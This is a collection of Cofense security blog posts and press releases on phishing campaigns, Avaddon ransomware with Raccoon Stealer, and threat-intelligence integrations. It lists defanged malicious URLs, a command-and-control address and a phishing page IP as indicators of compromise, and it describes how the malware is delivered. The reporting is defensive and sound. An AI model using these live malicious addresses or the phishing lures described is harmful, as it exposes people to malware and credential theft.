Avaddon Ransomware Joins Data Exfiltration Trend

By Aaron Riley, Cofense Intelligence

Summary 

A new attack pattern indicates that another ransomware family is expanding into data exfiltration. Ransomware traditionally forces victims to send a payment to recover their encrypted data. However, a growing number of ransomware operations is adding pressure using data exfiltration – victims who do not pay the ransom will have their data exposed publicly. Avaddon, a ransomware as a service (RaaS) that emerged this summer, is the latest family to join this trend, and its operators are almost certainly gearing up to leak the sensitive data of victims who do not quickly pay.  

Avaddon caught our attention in June when the Trik botnet started sending it to a broad set of targets, signaling threat actors’ willingness to cast a wider net in search of ransom payments. More recently, security researchers indicated that the operators of Avaddon set up a data leak website to publish stolen data if victims fail to pay the ransom. Cofense Intelligence is now seeing a campaign that combines Avaddon with an information stealer, indicating that threat actors are preparing to make use of this new extortion feature. The campaign has successfully evaded secure email gateways (SEGs) and targets several different industries, as discussed in detail below. 

Figure 1: Avaddon ransomware data dump webpage.

Smoke Loader Delivers Avaddon and Raccoon Stealer 

The email in Figure 2 is part of a campaign that attempts to encrypt the victim’s computer with Avaddon ransomware. Spoofing the FedEx brand and using the shipping theme, this phishing campaign starts with a malicious embedded link that has evaded some SEGs. When a user clicks the link, it downloads a malicious program, Smoke Loader which, in turn, delivers a two-part attack to the victim’s machine. The attack combines Avaddon with Racoon Stealer that can perform the data exfiltration portion of the campaign.  

Figure 2: Phishing email with an embedded link leading to a sample of Smoke Loader.

Data Exfiltration Increases Pressure, Adds Risk 

The exfiltration of sensitive data can be damaging to an organization and levy heavy legal, financial and reputational consequences, which is why threat actors use it to leverage extortion payment. In this instance, Raccoon Stealer provided the data theft and exfiltration feature that was not inherent in the Avaddon ransomware. Considering that Avaddon is a RaaS, it would be consistent for it to employ a malware as a service (MaaS), Raccoon Stealer, to add features. Using a MaaS sample as the data exfiltration component also allows the threat actors to plug-and-play with other MaaS families as needed. Combining these two services with a successful delivery mechanism such as Smoke Loader creates an attack that is both more lucrative for threat actors and more harmful to victims. 

With these most recent developments, Avaddon has joined a few other ransomware families in adding data exfiltration to use as leverage for extortion payments. The campaign shown in Figure 2 continued the trend of broad targeting—it was sent to a wide range of industries including energy, healthcare, insurance, manufacturing, mining and retail. As Avaddon sees increasing success from these efforts, we can expect more ransomware operators to follow suit. 

Diligent backups will no longer suffice to save an organization from a ransomware incident if sensitive or confidential data has been exfiltrated. Not only can the organization be reputationally damaged by a data leak but, depending on the laws and regulations surrounding the data, may be subject to fines and penalties. Data owners or regulators can potentially hold the organization liable and pursue legal recourse, exacerbating the cost of the ransomware incident.  

In conclusion, we predict that the most dangerous part of ransomware to organizations soon will be data exfiltration. 

Not a Cofense Intelligence customer? Learn how our phishing alerts help mitigate today’s dynamic threats. 

The Cofense® and PhishMe® names and logos, as well as any other Cofense product or service names or logos displayed on this blog are registered trademarks or trademarks of Cofense Inc. 

Humans and Machines – Phishing Mitigation Automation SOARing to New Heights

By Mike Saurbaugh

Cofense and Palo Alto Networks Cortex XSOAR integrate to counter phishing threats that evade secure email gateways (SEGs). Human-verified phishing indicators and automation squelch attackers. Cofense Intelligence, Cofense Triage and Cortex XSOAR combine to support SOCs in the fight against phish.

Conditioning employees to detect and report suspicious email is a strategy security leaders have adopted to protect the business and empower employees to become a defensive asset. As phishing emails evade secure email gateways (SEG), employees are the last line of defense and can be the difference between detection and response or an incident that leads to a breach. Cofense Triage ingests employee-reported suspicious email, allowing security teams to quickly assess and respond to threats. Cofense Intelligence is human-verified phishing intelligence powering security teams to respond to credible phishing threats.

Cofense Intelligence: What is Human-Verified Phishing Intelligence and Why Should I Care?

Cofense Intelligence is phishing-specific threat intelligence. Human-verified means that the Cofense intelligence and labs teams have vetted the indicators prior to consumption by customers. This ensures high-fidelity upon ingestion. Domains, URLs, IPs and hashes all have a corresponding impact rating that follows STIX. Major, moderate, minor and none ratings are applied to phishing indicators. This means that each indicator provided carries an impact rating so security teams can make educated decisions on what action to take.

A major impact-rating URL that was vetted by a seasoned security professional tells the customer that this URL is indeed malicious and should not be accessed. Knowing this information allows the security team to implement a block rule in the firewall to prevent employees from accessing a harmful link. Likewise, a suspicious domain may be an alert event. The point is that security professionals can more quickly implement rules with automation given the rigor that human vetting requires.

Machine-Readable and Human-Readable Phishing Intelligence

Cofense Intelligence provides context for analysts. Not just what’s bad, but what’s bad and why.

Integrations drive Cofense Intelligence via JSON, STIX or CEF, allowing SOARs, threat intelligence platforms (TIPs) and SIEMs to ingest updates on polling intervals because Cofense releases updates as soon as they’ve been vetted.

The end result is a cadence of polling machine-readable indicators to be leveraged in security solutions with the context to understand the phishing threat and its potential impact to the business.

Actionable Machine-Readable Intelligence

The following provides key fields to use in threat lookup validation, security solution integrations and threat hunting.

{
“success” : true,
“data” : {
“id” : 39377,
“relatedSearchTags” : [ ],
“feeds” : [ {
“id” : 23,
“permissions” : {
“WRITE” : false,
“READ” : true,
“OWNER” : false
},
“displayName” : “Cofense”
} ],
“blockSet” : [ {
“malwareFamily” : {
“familyName” : “NetWire Remote Access Trojan”,
“description” : “The Netwire RAT is used to take control of a user’s system, it has many capabilities including the ability to use a victim\u0027s computer as a proxy and keylogging functionality that extends to peripheral devices such as USB card readers.”
},
“impact” : “Major”,
“blockType” : “URL”,
“role” : “C2”,
“roleDescription” : “Command and control location used by malware”,
“data” : “hxxp://ddns[.]whsthings[.]xyz:4598”,
“data_1” : {
“url” : “hxxp://ddns[.]whsthings[.]xyz:4598”,
“domain” : “whsthings[.]xyz”,
“path” : “”,
“protocol” : “http”,
“host” : “ddns[.]whsthings[.]xyz”
}
}, {
“deliveryMechanism” : {
“mechanismName” : “CVE-2017-11882”,
“description” : “Microsoft Office exploit taking advantage of flaw in Microsoft Equation Editor
allowing for arbitrary code execution”
},
“impact” : “Major”,
“blockType” : “URL”,
“role” : “InfURL”,
“roleDescription” : “URL provided in email as means for infection”,
“data” : “hxxp://price2day[.]pk/CREDIT_NOTE_592609225.xlsx”,
“data_1” : {
“url” : “hxxp://price2day[.]pk/CREDIT_NOTE_592609225.xlsx”,
“domain” : “price2day.pk”,
“path” : “/CREDIT_NOTE_592609225.xlsx”,
“protocol” : “http”,
“host” : “price2day[.]pk”
}
}, {
“malwareFamily” : {
“familyName” : “NetWire Remote Access Trojan”,
“description” : “The Netwire RAT is used to take control of a user’s system, it has many capabilities including the ability to use a victim\u0027s computer as a proxy and keylogging functionality that extends to peripheral devices such as USB card readers.”
},
“impact” : “Major”,
“blockType” : “Domain Name”,
“role” : “C2”,
“roleDescription” : “Command and control location used by malware”,
“data” : “ddns[.]whsthings[.]xyz”,
“data_1” : “ddns[.]whsthings[.]xyz”

Figure 1: Machine-readable JSON output

Contextual Human-Readable Intelligence
When understanding the phishing threat and its severity are critical, Cofense’s portal and reports provide insight.

Figure 2: Executive Summary from Cofense Intelligence Active Threat Report

Figure 3: One of Many URLs Involved in the Threat Report

Figure 4: Description of Command and Control Malware with a Link to WebUI 

Cortex XSOAR Threat Intel Management Supercharges SOCs

Cortex XSOAR takes a new approach with native threat intelligence management, unifying aggregation, scoring, and sharing of threat intelligence with playbook-driven automation. With Cortex XSOAR, analysts eliminate manual tasks with automated playbooks to aggregate, parse, deduplicate, and manage millions of daily indicators across dozens of supported sources. From here, analysts take charge of their threat intelligence with playbook-based indicator lifecycle management and transparent scoring that can be extended and customized with ease.

With analysts potentially spread across the globe, Cortex XSOAR boosts collaboration to reveal critical threats by layering third-party threat intelligence with internal incidents to prioritize alerts for smarter response decisions.

Reputable sources of intelligence enable automated action to shut down threats across more than 450 third-party products with purpose-built playbooks based on proven SOAR capabilities.

Additionally, analysts can save time by executing intel-based playbooks to expedite threat hunting across disparate security tools. In this way, security teams can identify, gain context for, and prioritize alerts to advanced and relevant threats.

Leveraging Cofense Intelligence in Cortex XSOAR

Human-verified Cofense Intelligence complements Cortex XSOAR’s threat intelligence management module. Analysts can automatically block phishing threats by aggregating, deduplicating and syndicating protection from indicators sourced from Cofense Intelligence and other feeds.

From the JSON output shown earlier, analysts in Cortex XSOAR can enable the Cofense feed, provided they have a valid Cofense Intelligence license.

Figure 5: Cofense Feed Integration Application in Available in Cortex XSOAR

Within configuration settings, and because the intelligence feed is human-verified by Cofense, analysts can opt to set reliability to “completely reliable” and an indicator reputation as “bad.”

Figure 6: Cofense Intelligence Feed Configuration Settings

Cortex XSOAR’s dashboard is a quick and easy way to visualize Cofense Intelligence indicators.

Figure 7: Cortex XSOAR Threat Intelligence Management Dashboard – Cofense Intelligence Indicators

The URLs in this case can be assigned to an incident and attached to a playbook. In this way, as an example, one or more URLs within the Palo Alto Networks Next-Generation Firewall can be blocked.

Figure 8: URL Incident Remediation

Cofense Triage: Automating Analysis of Employee-Reported Phish

Security teams do their best to keep phish from making it to the employee’s mailbox. However, attackers are skilled at evading secure email gateways and other defenses. Cofense Triage ingests employee-reported phish to automatically uncover the latest attacks plaguing the enterprise.

Cofense pioneered phishing simulation to help organizations educate and condition employees to spot phish. Phishing simulation has been adopted by organizations worldwide and continues to be a staple of security programs.

Cofense Reporter empowers employees to report suspicious phish to the SOC so that they can analyze and respond to evasive perimeter phishing threats. A simple one-click feature in the email client is all that’s needed for employees to provide security teams with an additional source of intelligence.

Cofense Triage ingests and analyzes the reported emails, highlights real phish and removes benign messages mistakenly reported by employees. Cofense Triage benefits from Cofense Intelligence and several integrations, including Palo Alto Networks WildFire™.

Figure 9: Cofense Triage Infographic Workflow

Cofense Triage – An Enabler for Cortex XSOAR Playbooks

Cofense Triage APIs are accessible to Cortex XSOAR with an integration app to ingest processed phishing reports. This means that Cofense Triage and Cortex XSOAR customers can poll APIs from the application and assign to playbooks just as with Cofense Intelligence.

Analysts configure their app in Cortex XSOAR and ingest processed reports with designated threat indicators.

Figure 10: Cofense Triage Application in Cortex XSOAR

Figure 11: Cofense Triage Configuration – Assigning Incidents at Ingestion

Malicious Indicators Evading Secure Email Gateway

When employees report, security teams benefit. Take a look at malicious URLs and hashes as reported by conditioned employees who received phish and knew to report with Cofense Reporter.

Figure 12: Malicious Indicators in Cofense Triage

Cortex XSOAR Ingesting Threat Indicators from Cofense Triage

When a security analyst designates a file, URL or domain as malicious, they have vetted the threat as would Cofense’s Intelligence team. Knowing this, security professionals can ingest the indicators and allow them to run through a playbook for next step actions.

Figure 13: Ingested Malicious Hashes from Cofense Triage

Figure 14: Playbook Execution of Malicious File Attachment Reported by Employee

Multiple Sources of Intelligence in One View

Cortex XSOAR allows analysts to manipulate widgets to view all sources of intelligence or get more granular and investigate one source.

Figure 15: Dashboard View of Cofense Triage Feed

Secure email gateways and other security solutions are not impermeable. If your SOC is feeling the pain and is in need of some relief, Cofense and Cortex XSOAR bring that relief in seconds rather than days. When employee-reported and human-vetted sources of intelligence align, security teams can be more confident in their remedial actions. Whether it is endpoint or network-based remediation, or conducting a threat lookup to help make additional decisions, Cofense solutions complement the capabilities Cortex XSOAR offers to help customers centralize the security operation.

 

All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats.
The Cofense® and PhishMe® names and logos, as well as any other Cofense product or service names or logos displayed on this blog are registered trademarks or trademarks of Cofense Inc.

Cofense Announces Keynote Speakers for Virtual Submerge 2020

Leesburg, Va. – Aug. 20Cofense®, the global leader in intelligent phishing defense solutions, today released its speaker lineup and agenda details for Virtual Submerge 2020, the Global Phishing Defense Event of the Year. Set to take place virtually Sept. 22-23, Submerge will feature on-demand content focused on the latest trends in phishing attacks and phishing defense, specifically developed for individuals with security leadership, incident response, threat intelligence and security awareness responsibilities.

Featured keynote speaker Dmitri Alperovitch, Co-Founder and Chairman of Silverado Policy Accelerator and Co-Founder of Crowdstrike Inc., will join Cofense speakers Rohyt Belani, CEO and Co-Founder, Aaron Higbee, CTO and Co-Founder, and Keith Ibarguen, Chief Product Officer, to deliver thought-provoking keynote sessions. The Virtual Submerge 2020 agenda offers a variety of educational sessions and presentations that will examine the state of the industry’s phishing detection and response.

“On behalf of Cofense, I would like to thank our many speakers who each bring extremely valuable experience to share with our attendees – Virtual Submerge promises deeper, more hands-on content than ever before,” said Belani. “Sessions will arm attendees with the latest insights on how combining technology and human intelligence creates a network effect that can be leveraged to defend against threats and avoid a breach, while raising awareness of the ways malicious actors are actively targeting organizations every day.”

During the two-day event, Virtual Submerge will showcase information that security professionals can use to influence strategic planning and improve security operations. This includes the latest in phishing defense best practices, insights from global thought leaders on the current phishing threat landscape, and regionally focused snapshots into active threats that are targeting global businesses.

The following industry luminaries will also present during Virtual Submerge:

  • Nick Adams, GuideWire
  • Peter Crumpton, NFU Mutual
  • Jason Bohr and Ryan Praskovitch, Nationwide Insurance
  • Tony Fachaux, National Bank of Canada
  • JJ Hodges, Community Health Systems
  • Lisa Plaggemier, Media Pro
  • Susan Rassas, Shell Information Technology
  • Lori Temples & Elizabeth McConnell, GreenSky
  • Peter Vu, NRI Secure
  • Jeff Van Wingerden (CRISC), Sound Transit

“As the global phishing defense event of the year, it is our mission to bring the security community together for two days to emphasize the threat of phishing attacks. Whether you are a security executive, awareness professional or analyst, Virtual Submerge has breakout sessions designed specifically for you,” added Higbee. “Our team is committed to promoting unique perspectives on the evolving phishing threat landscape, and the most effective tools, techniques, and intelligence to stop phishing attacks in their tracks.”

Cofense’s network of over 20 million human sensors around the world empowers organizations with intelligence to rapidly stop phishing attacks, even after they have evaded Secure Email Gateway (SEG) technologies. To learn more about Virtual Submerge and to register, please visit https://cofense.com/submerge/.

About Cofense
Cofense®, the leading provider of intelligent phishing defense solutions worldwide, is uniting humanity against phishing. The Cofense suite of products combines timely attack intelligence on phishing threats that have evaded perimeter controls and were reported by employees, with best-in-class security operations technologies to stop attacks faster and stay ahead of breaches. Cofense customers include Global 1000 organizations in defense, energy, financial services, healthcare and manufacturing sectors that understand how changing user behavior will improve security, aid incident response and reduce the risk of compromise. For additional information, please visit www.cofense.com or connect with us on Twitter and LinkedIn.

Media Contact

press@cofense.com

 

Phish Found in Proofpoint-Protected Environments – Week Ending August 16, 2020

100% of the phish seen by the Cofense Phishing Defense Center (PDC) have been found in environments protected by Secure Email Gateways (SEGs), were reported by humans, and automatically analyzed and dispositioned by Cofense Triage.

Cofense solutions enable organizations to identify, analyze, and quarantine email threats in minutes.

Are phishing emails evading your Proofpoint Secure Email Gateway? The following are examples of phishing emails seen by the PDC in environments protected by Proofpoint. We note a preponderance of malware this week, both via attachment and image links. With security teams overloaded with phishing response, perhaps Cofense Intelligence can help?

sample phish delivers a .xxe attachment that uses guloader to install the remcos remote access trojan

TYPE: Malware – Remcos

DESCRIPTION: This phish reminds us of an important lesson: always do the needful. This does not include extracting the attached .xxe file, since that will execute GuLoader and download the Remcos Remote Access Trojan. And who needs that?

sample phish uses an image link to deliver the pyrogenic stealer

TYPE: Malware – Pyrogenic Stealer

DESCRIPTION: It’s a good thing the confidentiality notice in this email absolves the sender of any virus being passed on. This payment-themed phish provides what looks like a poorly rendered PDF, but is instead an image with a link to a Pyrogenic Stealer download.

sample phish uses an image link to deliver the nanocore remote access trojan

TYPE: Malware – NanoCore

DESCRIPTION: Another image link designed to look like an attachment. This one includes a very friendly “DOWNLOAD” instruction. Very helpful if you’re looking to download the NanoCore Remote Access Trojan, something we saw resurface in March of 2018.

sample phising in the finnish language uses an embedded url to deliver agent tesla

TYPE: Malware – Agent Tesla

DESCRIPTION: This phish is bad from start to finish (see what I did there?). Promising a shipping document with tracking number, it actually delivers a link to the Agent Tesla keylogger. Our Phish Fryday podcast gave it some good coverage earlier in the year.

sample phish delivers the wsh remote access troja with an embedded url

TYPE: Malware – WSH RAT

DESCRIPTION: Hoping to keep your balance up to date? Be careful what you wish for. This payment-themed phish delivers a link to the WSH Remote Access Trojan. We discussed this variant of the Houdini Worm back in 2019.

sample phish in italian delivers a jnlp file leading to the ursnif malware

TYPE: Malware – Ursnif

DESCRIPTION: My Italian is a bit rusty. Ok, non-existent. But a translation tells me this is a refund from the Italian social security agency. The attached .jnlp shortcut file leads to a JAR Downloader that then installs and runs the Ursnif malware. We’ve seen Italian speakers targeted with Ursnif before.

sample phish steals credentials with a dropbox hosted pdf

TYPE: Credential Theft

DESCRIPTION: You knew we wouldn’t make it through an entire post without a credential phish. This attack leverages trust in the Dropbox logo but actually uses Google Cloud Storage to host a linked PDF. The supposed “business proposal” will steal your credentials faster than you can say trusted cloud storage.

Malicious emails continue to reach user inboxes, increasing the risk of account compromise, data breach, and ransomware attack. The same patterns and techniques are used week after week.

Recommendations

Cofense recommends that organizations train their personnel to identify and empower them to report these suspicious emails. Cofense PhishMe® customers should use SEG Miss templates to raise awareness of these attacks. Organizations should also invest in Cofense Triage and Cofense Vision to quickly analyze and quarantine the phishing attacks that evade Secure Email Gateways.

Interested in seeing more? Search our Real Phishing Threats Database.

All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats.

The Cofense® and PhishMe® names and logos, as well as any other Cofense product or service names or logos displayed on this blog are registered trademarks or trademarks of Cofense Inc.

Phish Fryday – Phishing Defense Expertise

Identifying a phishing email is more than a yes/no, good/bad equation. If it’s bad, you need to know how bad it is. If my user clicked it, what happened? What do I need to do to protect my organization? Answering these questions requires a certain level of expertise with tools and strategies for analyzing malicious emails. Joining us this week is Cofense Director of Product Management Pete Smith to talk about the skills needed to break down an attack to understand the Indicators of Compromise that result from a successful attack.

Learn more:

Phishing attacks target locale-specific users

Cofense Submerge 2020 goes virtual

Cofense speaks with IMAX about phishing defense

Request access to Ask an Expert

Contact Pete Smith

Questions or comments? Reach us at phishfryday@cofense.com

Phishing Threat Preys on Desperate Business Owners

By Kyle Duncan and Noah Mizell, Cofense Phishing Defense Center

For the past few months, businesses across the nation have suffered from the financial strain brought on by COVID-19. Government relief has become a major concern as businesses struggle to stay afloat. The Cofense Phishing Defense Center (PDC) has taken notice of a new phishing campaign that once again aims to abuse Covid-related fear and uncertainty. This campaign imitates the U.S. Small Business Administration (SBA) to harvest the credentials of business owners who may be expecting the administration’s assistance.

While the spoofed address for this attack is one the SBA uses and is even listed on their website, one brief look at this example’s “Received” path shows it did not originate from the SBA.

Figure 1-2: Email Header

These first four stops on the email’s Received path indicate that the email originated from Japanese email servers. This can not only be seen in the Received path but also in other fields of the header information. The Japanese IP address is seen in the Authentication-Results-Original and the Japanese domain can be seen in the Message-ID in some cases.

Figure 3-4: Email Body

The email body of this phish is very clean and well-constructed. Barring the excessive use of commas, the email looks legitimate at a glance. The threat actor has even compiled legitimate logo images and contact information to help sell the deception. Small business owners who have applied for federal aid would be hopeful and relieved to see this message in their inbox.

When you hover over the “Review and Proceed” button, however, the facade falls. Instead of sending users to SBA.gov, this button will redirect to the phishing page:

hXXps://ion-homes[.]com/sba/covid19relief/sba.gov/

The phishing page at this URL redirects to an SBA phishing login page with similar logo, positioning, and details to the real site. While the phishing domain differs, the threat actor has notably attempted to mirror the URL structure from the legitimate SBA’s login URL by tossing in ‘covid19relief’ into the directory name.

Figure 5: Phishing Page

Upon entering their login credentials, users are then redirected to the official SBA website, specifically the login page as seen in Figure 5.

Figure 6: Official Small Business Association Page

Instead of receiving aid, business owners who fall for the scam give away their credentials—adding insult to injury.

LEARN MORE about the Cofense Phishing Defense Center. See how the PDC’s managed phishing response and remediation stops phishing attacks that elude email gateways.

Network IOC  IP  
hXXps://ion-homes[.]com/sba/covid19relief/sba.gov/ 173.231.209.178
All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats.
The Cofense® and PhishMe® names and logos, as well as any other Cofense product or service names or logos displayed on this blog are registered trademarks or trademarks of Cofense Inc.

Phish Found in Proofpoint-Protected Environments – Week Ending August 9, 2020

100% of the phish seen by the Cofense Phishing Defense Center (PDC) have been found in environments protected by Secure Email Gateways (SEGs), were reported by humans, and automatically analyzed and dispositioned by Cofense Triage.

Cofense solutions enable organizations to identify, analyze, and quarantine email threats in minutes.

Are phishing emails evading your Proofpoint Secure Email Gateway? The following are examples of phishing emails seen by the PDC in environments protected by Proofpoint. This week sees a variety of the same ol’, same ol’. Logistics spoofs, trusted cloud storage, and finance themes. Good thing humans can be trained to detect these things.

phishing example delivers a zipped jnlp java downloader to then deliver ursnif banking trojan

TYPE: Malware – Ursnif

DESCRIPTION: Threat actors in this connected age love to spoof logistics companies. This example warns of a package being returned to the sender. The attached, zipped .jnlp shortcut file leads to a JAR Downloader that runs the Ursnif malware. This is one package you do not want to receive.

phishing example of credential theft using dropbox link

TYPE: Credential Theft

DESCRIPTION: Cloud storage is certainly convenient for sharing files with friends and colleagues. Attackers think so, too. This one uses Dropbox to deliver a credential phishing page to the recipient. How convenient is that?

phishing example uses a delivery spoof with a link to credential theft page

TYPE: Credential Theft

DESCRIPTION: These attackers really stepped up their game with a convincing looking phish mimicking another logistics company. If only it hadn’t come from a Hotmail account.

phishing example uses an image link to direct the recipient to the pyrogenic stealer

TYPE: Malware – Pyrogenic

DESCRIPTION: It may look like a PDF, but this finance-themed phish actually delivers a linked image that appears to be an attachment. The link leads to the Pyrogenic Stealer.

phishing example of OneDrive link to download agent tesla keylogger

TYPE: Malware – Agent Tesla

DESCRIPTION: Here’s your quote for the day: beware of emails bearing malware. This attack identifies as a quote but delivers the Agent Tesla Keylogger via an embedded URL.

phishing example uses a coronavirus theme to perform credential theft

TYPE: Credential Theft

DESCRIPTION: They say rest and exercise are good for you, but this exercise starter kit from HR is really at the other end of the scale. The provided link takes the recipient to a web page designed to steal their credentials. That’s sure to get your heart rate up.

Malicious emails continue to reach user inboxes, increasing the risk of account compromise, data breach, and ransomware attack. The same patterns and techniques are used week after week.

Recommendations

Cofense recommends that organizations train their personnel to identify and empower them to report these suspicious emails. Cofense PhishMe® customers should use SEG Miss templates to raise awareness of these attacks. Organizations should also invest in Cofense Triage and Cofense Vision to quickly analyze and quarantine the phishing attacks that evade Secure Email Gateways.

Interested in seeing more? Search our Real Phishing Threats Database.

All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats.

The Cofense® and PhishMe® names and logos, as well as any other Cofense product or service names or logos displayed on this blog are registered trademarks or trademarks of Cofense Inc.

Phish Found in Proofpoint-Protected Environments – Week Ending August 2, 2020

100% of the phish seen by the Cofense Phishing Defense Center (PDC) have been found in environments protected by Secure Email Gateways (SEGs), were reported by humans, and automatically analyzed and dispositioned by Cofense Triage.

Cofense solutions enable organizations to identify, analyze, and quarantine email threats in minutes.

Are phishing emails evading your Proofpoint Secure Email Gateway? The following are examples of phishing emails seen by the PDC in environments protected by Proofpoint. We note quite a bit of spoofing this week. Attackers know if they can get their phishing attacks into a user’s inbox, they still need to convince the user to click. If you need help raising the awareness of your users, check out some of our free resources.

phishing example invoice theme delivers pyrogenic stealer with embedded link

TYPE: Malware – Pyrogenic

DESCRIPTION: For such a polite email is carries an awfully impolite payload, as this finance-themed phish uses an embedded URL disguised as a PDF to deliver the Pyrogenic Stealer.

phishing example uses PDF attachment to perform credential theft.

TYPE: Credential Theft

DESCRIPTION: Spoofing an international logistics company, this phish delivers an attached PDF with embedded links to a credential phishing site.

phishing example of a purchase order link that delivers nanocore remote access trojan

TYPE: Malware – NanoCore

DESCRIPTION: Everyone knows Dropbox is a legitimate cloud storage provider so, when we get a purchase order hosted on Dropbox, we click it. At least, that’s what the attacker hopes. In this attack, an archive holding the NanoCore Remote Access Trojan is downloaded. We’ve been discussing the use of Dropbox in phishing attacks for over 5 years.

phishing example spoofs logistics company to deliver avaddon ransomware and raccoon stealer

TYPE: Malware – Avaddon

DESCRIPTION: Another spoof of a major logistics company. This one really delivers. Using an embedded URL it delivers the Smoke Loader that then downloads Raccoon Stealer and Avaddon Ransomware. Read more about ransomware trends.

phishing example spoofs a voicemail delivers htm attachment to perform credential theft

TYPE: Credential Theft

DESCRIPTION: Stop me if you’ve heard this one. A spoofed voicemail notification uses an attached .htm file to mimic a Microsoft page to steal credentials. Voicemail notification phish are nothing new, but still reach users regularly.

phishing example delivers remcos rat using an xxe archive

TYPE: Malware – Remcos

DESCRIPTION: Self-quarantines and remote work arrangements seem like a recipe for increased deliveries and this phish takes advantage of that. Another logistics company spoof offers an invoice as a lure. In a rare twist, the attack delivers a .xxe archive that contains GuLoader, which will install the Remcos Remote Access Trojan.

phishing example uses box.com to deliver ursnif malware

TYPE: Malware – Ursnif

DESCRIPTION: Another attack relying on trust in a popular cloud storage provider. This one includes a link to a .js file that downloads and executes Ursnif. Are we having trust issues?

phishing example delivers password-protected zip to install icedid banking trojan

TYPE: Malware – IcedID

DESCRIPTION: If it is protected by a password, it must be secure. That’s the lure this attacker uses to convince the recipient to open the attached .zip archive, enable the macros in the provided Microsoft Office document, and install the IcedID trojan. It’s a blast from the past, as we wrote about password-protected ZIP files in phishing attacks way back on 2011.

phishing example spoofs small business administration sba with coronavirus theme to perform credential theft

TYPE: Credential Theft

DESCRIPTION: While we hoped to get through an entire week’s blog without a COVID-19 example, it wasn’t meant to be. This phish pretends to be from the US Small Business Administration with details about an approved funding request. The embedded URL leads to a credential phishing page. Recipients should keep their mouse at least 6 feet away from the link.

Malicious emails continue to reach user inboxes, increasing the risk of account compromise, data breach, and ransomware attack. The same patterns and techniques are used week after week.

Recommendations

Cofense recommends that organizations train their personnel to identify and empower them to report these suspicious emails. Cofense PhishMe® customers should use SEG Miss templates to raise awareness of these attacks. Organizations should also invest in Cofense Triage and Cofense Vision to quickly analyze and quarantine the phishing attacks that evade Secure Email Gateways.

Interested in seeing more? Search our Real Phishing Threats Database.

All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats.

The Cofense® and PhishMe® names and logos, as well as any other Cofense product or service names or logos displayed on this blog are registered trademarks or trademarks of Cofense Inc.

Cofense Expands SOAR Integration Partners to Accelerate Phishing Incident Response

Enhanced integrations between Cofense Triage, Cofense Intelligence and SOAR solutions enable security teams to quickly respond to phishing campaigns that slip past perimeter defenses

LEESBURG, Va., Aug. 3, 2020 – Cofense®, the global leader in intelligent phishing defense solutions, today announced enhanced phishing analysis integrations with Cofense TriageTM and Cofense IntelligenceTM to further complement security orchestration, automation and response (SOAR) solutions from Palo Alto Networks Cortex XSOAR, ServiceNow Security Incident Response and Splunk Phantom.

Before phishing threats become actionable, security operations teams must quickly prioritize and analyze large volumes of suspicious emails to understand what is truly malicious. Cofense Triage automatically inspects employee-reported suspicious emails and turns phishing threat indicators into actionable intelligence to help security operations teams respond in minutes to threats that slip past perimeter defenses such as secure email gateways (SEGs). Cofense Intelligence is human-verified phishing intelligence that provides high-fidelity phishing indicators for security teams to respond with confidence when taking action on a phishing threat. Today’s leading SOAR solutions offer many benefits for security operations teams, and Cofense Triage and Cofense Intelligence continue to augment phishing incident response capabilities SOARs offer.

“Threat actors design their attacks to bypass email security controls and successfully deliver phishing emails directly to employee inboxes – technology alone is not enough to stop or analyze phishing threats. Cofense solutions leverage the intelligence of over 23 million human sensors to identify phishing attacks that technology misses every day,” said Allan Carey, Vice President of Business Development at Cofense. “Cofense Triage and Cofense Intelligence are complementary to SOAR, security information and event management (SIEM) and threat intelligence platform (TIP) tools, seamlessly integrating with existing security operations technologies and processes. We are committed to growing our technology partnerships and integrations, which provide mutual customers with accurate and reliable phishing defense determinations.”

“Cofense Triage integrating with Cortex XSOAR helps our security operations team quickly analyze, automate, and respond to phishing attacks in minutes, not hours,” said Rick DeLoach, Associate Director of Security Architecture and Operations, ADT. “The solutions are complementary to help analysts define and execute an effective workflow.”

Cofense Intelligence is an easy to consume API feed of malware and credential phishing campaigns. The feed supports automated ingestion into an organization’s SOAR, SIEM, TIP and other select technologies so that defenders can take swift action against emerging phishing campaigns. Every piece of Cofense Intelligence published is rigorously vetted by Cofense and includes the context an organization needs to understand the impact of phishing indicators of compromise (IOC) and threat actor tactics, techniques and procedures (TTPs).

Cofense Triage offers comprehensive clustering capabilities to group reported emails by payload fingerprint, which addresses the challenge of understanding threats holistically. This allows analysis at a threat campaign level, rather than an individual email level. Organizations looking for a managed phishing defense solution can turn to Cofense’s Phishing Defense Center® (PDC) and receive analyst-reviewed indicators into their SOAR platform and automate escalation and response.

For a limited time, organizations can also stay on top of the latest threats that are confirmed to have reached employees inboxes with 90 days of free access to Cofense Intelligence. To learn more, visit the Cofense Real Phishing Threats searchable database and SEG Infocenter.

About Cofense
Cofense®, the leading provider of intelligent phishing defense solutions worldwide, is uniting humanity against phishing. The Cofense suite of products combines timely attack intelligence on phishing threats that have evaded perimeter controls and were reported by employees, with best-in-class security operations technologies to stop attacks faster and stay ahead of breaches. Cofense customers include Global 1000 organizations in defense, energy, financial services, healthcare and manufacturing sectors that understand how changing user behavior will improve security, aid incident response and reduce the risk of compromise. For additional information, please visit https://www.cofense.com or connect with us on Twitter and LinkedIn.

Twitter Announces Hackers Gained Access via Phishing Attack

